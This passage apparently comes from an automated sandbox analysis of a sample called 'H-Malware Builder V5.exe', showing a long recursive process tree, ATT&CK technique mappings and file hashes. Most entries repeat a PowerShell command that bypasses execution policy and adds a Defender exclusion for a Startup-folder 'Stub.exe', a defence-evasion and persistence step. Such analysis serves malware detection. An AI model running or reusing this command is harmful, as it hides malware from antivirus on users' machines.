        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4684
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        23⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        22⤵
        Drops startup file
        
        PID:3972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2576
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        23⤵
        Drops startup file
        
        PID:1216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5108
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        25⤵
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        24⤵
        Drops startup file
        
        PID:4224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2180
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        26⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        25⤵
        Drops startup file
        
        PID:4384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:716
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        26⤵
        Drops startup file
        
        PID:3200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1612
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        28⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3032
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        27⤵
        Drops startup file
        
        PID:4256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1332
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        29⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        28⤵
        Drops startup file
        
        PID:4412
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4820
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        30⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        29⤵
        Drops startup file
        
        PID:1936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4696
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1556
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        30⤵
        Drops startup file
        
        PID:4340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        32⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        31⤵
        Drops startup file
        
        PID:2636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3724
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        32⤵
        Drops startup file
        
        PID:4764
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4992
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        34⤵
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        33⤵
        Drops startup file
        
        PID:4416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4256
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        34⤵
        Drops startup file
        
        PID:3168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        35⤵
        Drops startup file
        
        PID:2336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3716
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        36⤵
        Drops startup file
        
        PID:4536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1832
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        38⤵
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        37⤵
        Drops startup file
        
        PID:4120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        38⤵
        Drops startup file
        
        PID:1292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        40⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        39⤵
        Drops startup file
        
        PID:3080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3972
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        41⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        40⤵
        Drops startup file
        
        PID:1476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        41⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1208
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        42⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        41⤵
        Drops startup file
        
        PID:3432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        42⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2180
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        43⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        42⤵
        Drops startup file
        
        PID:3596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4604
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        44⤵
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        43⤵
        Drops startup file
        
        PID:1676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        44⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4112
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        45⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        44⤵
        Drops startup file
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1124
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        46⤵
        
        PID:3076
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        45⤵
        Drops startup file
        
        PID:3036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        46⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1980
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        47⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        46⤵
        Drops startup file
        
        PID:1856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4448
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        48⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        47⤵
        Drops startup file
        
        PID:684
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        48⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1544
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        49⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        48⤵
        Drops startup file
        
        PID:3048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:984
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        50⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        49⤵
        Drops startup file
        
        PID:2820
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2088
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        51⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        50⤵
        Drops startup file
        
        PID:1192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4616
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        52⤵
        Suspicious use of SetWindowsHookEx
        
        PID:244
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        51⤵
        Drops startup file
        
        PID:648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        53⤵
        
        PID:400
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        52⤵
        Drops startup file
        
        PID:1796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3364
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        54⤵
        
        PID:1548
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        53⤵
        Drops startup file
        
        PID:2336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        55⤵
        
        PID:1780
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        54⤵
        Drops startup file
        
        PID:3120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4956
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        56⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        55⤵
        Drops startup file
        
        PID:4112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4812
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        57⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        56⤵
        
        PID:4992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3524

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3888

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3944

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4056

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4936

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1716

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2624

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1640

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3028

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2292

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1388

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER.03f76abe-900d-4ec6-8715-1cea4211af95.tmp.csv

Filesize
36KB

MD5
980bef6cc3a856ede99bdd9ddda61826

SHA1
73e623f03a58bc3e16564dc2a4dccef19570d7a1

SHA256
8fea74c81dae390d923a75b5e8709379cfd25046a6579d2bfebe60074e891cc2

SHA512
c2a98a89fa42ec3b41a45c97cbb764490c97d48c110e9e7590779d72f265989a1c04248565e3166d2de2bf24adeaccdbe135eb89f3ecaa9f019027fc07da4268

